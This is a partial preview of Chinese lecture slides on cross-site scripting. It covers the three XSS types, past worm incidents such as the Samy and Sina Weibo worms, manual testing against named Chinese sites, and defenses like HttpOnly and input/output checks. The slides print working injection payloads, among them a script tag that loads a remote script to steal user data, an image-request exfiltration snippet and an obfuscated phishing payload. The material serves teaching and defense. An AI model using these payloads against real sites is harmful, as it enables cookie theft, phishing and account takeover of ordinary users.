XSS跨站脚本攻击解读课件_第1页
XSS跨站脚本攻击解读课件_第2页
XSS跨站脚本攻击解读课件_第3页
XSS跨站脚本攻击解读课件_第4页
XSS跨站脚本攻击解读课件_第5页
已阅读5页,还剩82页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

XSS跨站脚本攻击主要内容XSS跨站脚本攻击定义01XSS跨站脚本攻击类型02XSS跨站脚本攻击漏洞挖掘04如何防范XSS跨站脚本攻击漏洞05XSS跨站脚本攻击方式与实例03XSS定义跨站脚本攻击(CrossSiteScripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。为了与层叠样式表(CascadingStyleSheets)的缩写CSS区分开,跨站脚本攻击通常简写为XSS。XSS <?php $username=$_GET["name"]; echo"<p>欢迎您,".$username."!</p>"; ?>代码的主要作用是获取用户输入的参数作为用户名,并在页面中显示“欢迎您,XXX”的形式XSShttp://localhost/test.php?name=张三XSShttp://localhost/test.php?name=<script>alert(/我的名字是张三/)</script>XSS类型反射型XSS存储型XSSDOMBasedXSS反射型XSS反射型XSS只是简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输出,导致输出的数据中存在可被浏览器执行的代码数据。由于此种类型的跨站代码存在于URL中,所以黑客通常需要通过诱骗或加密变形等方式将存在恶意代码的链接发给用户,只有用户点击以后才能使得攻击成功实施。反射型XSS反射型XSS是最为常见的一种XSS类型反射型XSS反射型XSS反射型XSS反射型XSS反射型XSS反射型XSS存储型XSS存储型XSS脚本攻击是指由于Web应用程序对用户输入数据的不严格,导致Web应用程序将黑客输入的恶意跨站攻击数据信息保存在服务端的数据库或其他文件形式中,当网页进行数据查询展示时,会从数据库中获取数据内容,并将数据内容在网页中进行输出展示,进而导致跨站脚本代码的执行。存储型XSS存储型XSS脚本攻击最为常见的场景就是在留言板、博客或新闻发布系统中,恶意代码的数据信息直接写入文章、评论、留言中,浏览时即会执行相应的脚本代码。存储型XSS存储型XSSBo-Blog早期版本评论部分的存储型XSSDOMBasedXSS基于DOM的XSS跨站脚本攻击是通过修改页面DOM节点数据信息而形成的XSS跨站脚本攻击。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的JavascriptDOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。DOMBasedXSSDOMBasedXSS/img/baidu_sylogo1.gif<imgsrc=‘/img/baidu_sylogo1.gif’></img>DOMBasedXSS#’onerror=’javascript:alert(/DOMBasedXSSTest/)<imgsrc=‘#’onerror=’javascript:alert(/DOMBasedXSSTest/)’></img>DOMBasedXSSDOMBasedXSSDOMBasedXSSXSS攻击方式与实例XSS攻击方式绝不是弹窗这么简单……XSS攻击方式与实例XSS偷取用户信息XSS盗取CookieXSS钓鱼攻击XSS蠕虫攻击XSS偷取用户信息2/U8Portal/Desktopdefault.aspx?serialNo='><iframesrc="">XSS偷取用户信息XSS偷取用户信息(未完待续)XSS偷取用户信息(完)XSS偷取用户信息2/U8Portal/Desktopdefault.aspx?serialNo='><scriptsrc=http://193.168.20.XXX/getinfo.js></script>XSS偷取用户信息收取XSS偷取到的用户信息浏览器的同源策略相同协议相同域名相同端口:8080跨域提交img=newImage();img.src="/get.asp?message="+msg;XSS偷取用户信息如何诱骗对方?URL编码变形?短链接变形?隐藏在其他页面中?......XSS盗取Cookie对某个钓鱼网站的XSS攻击测试XSS盗取CookieXSS盗取CookieXSS盗取CookieXSS盗取CookieXSS盗取CookieXSS钓鱼攻击以盛大论坛的跨站钓鱼攻击演示。首先需要了解的就是,盛大的游戏登陆都是使用盛大通行证进行登录的,而盛大的论坛也是使用盛大通行证进行登录,所以如果黑客通过盗取用户登录论坛时的信息,就相当于盗取了用户的账号和密码,盛大的论坛就存在XSS漏洞,使得黑客可以通过XSS钓鱼攻击方式获取用户的账号和密码XSS钓鱼攻击存在过滤不严的位置为用户资料中的个人主页部分。[url]http://''STYLE='a:expression(document.write("<s\143riptlanguage=javas\143riptsrc=/1.jpgCharset=GB2312></s\143ript>"))'target=_blank[/url]然后利用插入代码的账号在论坛中发帖子或回复,当别的用户访问该账号发布或回复的帖子时,就会执行插入的恶意代码。/1.jpg就是构造的恶意代码,这个代码是用来钓鱼的页面。XSS钓鱼攻击XSS钓鱼攻击XSS蠕虫攻击XSS蠕虫的破坏力和影响力都是巨大的。XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。XSS蠕虫攻击出现最早、最出名的XSS蠕虫攻击事件MySpace的SamyXSS蠕虫攻击事件MySpace是全球互联网上最大的个人空间,是以SNS为基础的娱乐平台,也是全球最大的在线交友平台,通过MySpace用户可以很容易地建立属于自己的个性空间,上传照片,发表日志,还可以分享其他人发布的相关信息等。MySpace也支持交友功能,好友信息会显示在个人空间的好友列表中,但是,如果想通过MySpace添加其他人为自己的好友,需要得到对方的验证通过才可以。2005年10月,一个名叫Samy的人在网上发布了一片文章,在文章中他说找到了一种方法可以借助MySpace网站自身存在的漏洞实现自动化添加自己到别人的空间中,并且经过他测试这种方法,在3个小时内,添加了2429个好友,同时收到了6373个来自MySpace上其他人添加自己为好友的请求,由此而导致了大量的恶意数据和垃圾信息在MySpace上传播,对网站和用户都造成了巨大的损失。XSS蠕虫攻击我国曾经爆发过的典型XSS蠕虫攻击事件百度XSS蠕虫攻击人人XSS蠕虫攻击搜狐XSS蠕虫攻击新浪微博XSS蠕虫攻击......XSS蠕虫攻击百度XSS蠕虫事件在短短几个小时蠕虫的访问量就有几千IPXSS蠕虫攻击人人网蠕虫攻击事件中流量在几天时间里大增,这些天应该是蠕虫感染的时间。日访问人数从0猛增到500百万人/天XSS蠕虫攻击搜狐XSS蠕虫攻击事件中也有大量的用户收到攻击和感染XSS蠕虫攻击一次典型的XSS蠕虫攻击事件2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,微博用户中招后,会自动通过发微博和发送私信的方式将XSS蠕虫信息对外传播,发布带有恶意脚本的链接地址,当用户的粉丝点击带有恶意脚本的链接后就会再次中毒,进而形成恶性循环。其中众多加V认证的用户受到感染,当此类用户发布相关微博和私信内容后,蠕虫的传播将变得更为广泛,影响也更为严重。在不到一个小时的时间,已经有超过3万微博用户受到该XSS蠕虫的攻击。XSS蠕虫攻击黑客通过对新浪微博的分析测试发现新浪名人堂部分由于代码过滤不严,导致XSS漏洞的存在,并可以通过构造脚本的方式植入恶意代码。通过分析我们发现,在新浪名人堂部分中,当提交/pub/star/g/xyyyd"><scriptsrc=///images/t.js></script>?type=update时,新浪会对该字符串进行处理,变成类似/pub/star.php?g=xyyyd"><scriptsrc=///images/t.js></script>?type=update,而由于应用程序没有对参数g做充足的过滤且将参数值直接显示在页面中,相当于

在页面中嵌入了一个来自于2的js脚本,该JS脚本是黑客可以控制的文件,进而使得黑客可以构造任意js脚本嵌入到的页面中,且通过Ajax技术完全可以实现异步提交数据的功能,进而黑客通过构造特定的js代码实现了受此XSS蠕虫攻击的客户自动发微薄、添加关注和发私信等操作。XSS蠕虫攻击XSS蠕虫攻击蠕虫代码:/images/t.jsXSS蠕虫攻击蠕虫代码:/images/t.jsXSS蠕虫攻击详细分析操作1:发布一条微博,微博的题目为随机题目,且这些题目均为当时网络环境中比较热门或有争议的题目,诱骗用户点击。XSS蠕虫攻击详细分析操作2:关注加uid为2201270010的账户,且该账户就为此次攻击事件的操纵者,即用户名称为hellosamy用户XSS蠕虫攻击详细分析操作3:构造并私信的方式将恶意链接信息发送到好友账号中,且题目仍然为上面提到的热门话题,进而实现恶意链接的快速传播和感染挖掘XSS漏洞挖掘XSS漏洞方法扫描工具自动化检测手工测试源码分析挖掘XSS漏洞扫描工具自动检测WVSAppScanJSky挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程/User/UserBuyInfo/UserBuyInfo.php?UserName=%bf");eval(String.fromCharCode(97,108,101,114,116,40,34,32,120,115,115,34,41));//挖掘XSS漏洞手工测试卡卡论坛存储型XSS测试过程卡卡论坛图片EXIF信息存储型XSS挖掘XSS漏洞手工测试卡卡论坛存储型XSS测试过程卡卡论坛图片EXIF信息存储型XSS挖掘XSS漏洞手工测试卡卡论坛存储型XSS测试过程卡卡论坛图片EXIF信息存储型XSS挖掘XSS漏洞手工测试卡卡论坛存储型XSS测试过程卡卡论坛图片EXIF信息存储型XSS挖掘XSS漏洞手工测试卡卡论坛存储型XSS测试过程卡卡论坛图片EXIF信息存储型XSS挖掘XSS漏洞源码分析输入输出触发输出查询XSS漏洞的防范XSS跨站脚本攻击漏洞防范客户端用户IE8及高版本,开启XSS筛选器功能Firefox使用CSP、Noscript等扩展功能瑞星个人防火墙2012版本开启XSS拦截功能Web应用程序员使用HttpOnly完善的输入、输出检查XSS漏洞的防范XSS跨站脚本攻击漏洞防范HttpOnlyHttpOnly最初是由微软提出的,目前已经被多款流行浏览器厂商所采用。HttpOnly的作用不是过滤XSS跨站脚本攻击,而是浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie,解决XSS跨站脚本攻击后的Cookie会话劫持行为。XSS漏洞的防范XSS跨站脚本攻击漏洞防范HttpOnlyhttpOnly是在Set-Cookie时进行标记的,设置的Cookie头格式如下: Set-Cookie:<name>=<value>[;<name>=<value>] [;expires=<date>][;domain=<domain_name>] [;path=<some_path>][;secure][;HttpOnly]XSS漏洞的防范XSS跨站脚本攻击漏洞防范HttpOnly以php为例,在php5.2版本时就已经在Setcookie函数加入了对HttpOnly的支持,如 <?php setcookie("user","admin",NULL,NULL,NULL,NULL,TRUE); ?>

通过以上代码就可以设置user这个cookie,将其设置为HttpOnly,setcookie函数实质是通过向客户端发送原始的HTTP报文头进行设置的,document将不可见这个Cookie,所以使用document.cookie就取不到这个Cookie,也就实现了对Cookie的保护。XSS漏洞的防范XSS跨站脚本攻击漏洞防范输入、输出检查由于三种XSS跨站脚本攻击类型的漏洞成因可不相同,针对输入输出的检查一部分适用于反射型XSS与存储型XSS,而另外一些检查适用于基于DOM的XSS。XSS漏洞的防范反射型和存储型XSS输入、输出检查输入检查在大多数的时候都是对可信字符的检查或输入数据格式的检查,如用户输入的注册账号信息中只允许包括字母、数字、下划线和汉字等,对于输入的一切非白名单内的字符均认为是非法输入。数据格式如输入的IP地址、电话号码、邮件地址、日期等数据都具有一定的格式规范,只有符合数据规范的输入信息才允许通过检查。XSS漏洞的防范反射型和存储型XSS输入、输出检查输出检查输出检查主要是针对数据展示过程中,应该对数据信息进行HTML编码处理,将可能存在导致XSS跨站脚本攻击的恶意字符进行编码,在不影响正常数据显示的前提条件下,过滤恶意字符。XSS漏洞的防范反射型和存储型XSS输入、输出检

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论